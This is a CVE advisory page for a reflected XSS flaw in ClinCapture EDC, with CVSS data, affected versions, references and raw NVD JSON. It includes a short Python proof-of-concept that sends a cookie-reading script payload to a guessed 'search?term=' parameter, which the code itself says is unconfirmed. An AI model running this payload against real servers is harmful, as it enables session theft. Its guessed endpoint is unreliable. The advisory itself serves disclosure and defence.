CVE-2025-65270

Description

Reflected cross-site scripting (XSS) vulnerability in ClinCapture EDC 3.0 and 2.2.3, allowing an unauthenticated remote attacker to execute JavaScript code in the context of the victim's browser.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:clincapture:captivate_electronic_data_capture:2.2.3:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:clincapture:captivate_electronic_data_capture:3.0:*:*:*:*:*:*:* - VULNERABLE

ClinCapture EDC < 3.0

ClinCapture EDC < 2.2.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2025-65270 PoC - Reflected XSS in ClinCapture EDC
# Target: ClinCapture EDC 3.0 and 2.2.3

target_url = "http://target-server.com/"

# Malicious JavaScript payload for XSS
xss_payload = "<script>alert(document.cookie)</script>"

# Encode the payload for URL
encoded_payload = urllib.parse.quote(xss_payload)

# Construct malicious URL with reflected XSS parameter
# Note: The exact vulnerable parameter needs to be identified through testing
malicious_url = f"{target_url}search?term={encoded_payload}"

print(f"[*] Target: {target_url}")
print(f"[*] Malicious URL: {malicious_url}")
print(f"[*] Payload: {xss_payload}")

# Send the crafted request
try:
    response = requests.get(malicious_url, timeout=10)
    if xss_payload in response.text:
        print("[+] XSS payload reflected in response - Vulnerability confirmed!")
    else:
        print("[-] Payload not found in response")
except requests.RequestException as e:
    print(f"[-] Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65270
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65270
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65270/
[4] VulDB https://vuldb.com/cve/CVE-2025-65270
[5] https://github.com/xh4vm/CVE-2025-65270
[6] https://www.clincapture.com/
[7] https://github.com/xh4vm/CVE-2025-65270

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65270", "sourceIdentifier": "[email protected]", "published": "2025-12-22T18:16:16.813", "lastModified": "2026-01-05T17:51:59.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Reflected cross-site scripting (XSS) vulnerability in ClinCapture EDC 3.0 and 2.2.3, allowing an unauthenticated remote attacker to execute JavaScript code in the context of the victim's browser."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:clincapture:captivate_electronic_data_capture:2.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "12E9AB8C-7645-47B5-A716-C50F010E36A1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:clincapture:captivate_electronic_data_capture:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DF2B6FDD-95A3-49F6-94AF-65AAA31EE59F"}]}]}], "references": [{"url": "https://github.com/xh4vm/CVE-2025-65270", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.clincapture.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/xh4vm/CVE-2025-65270", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}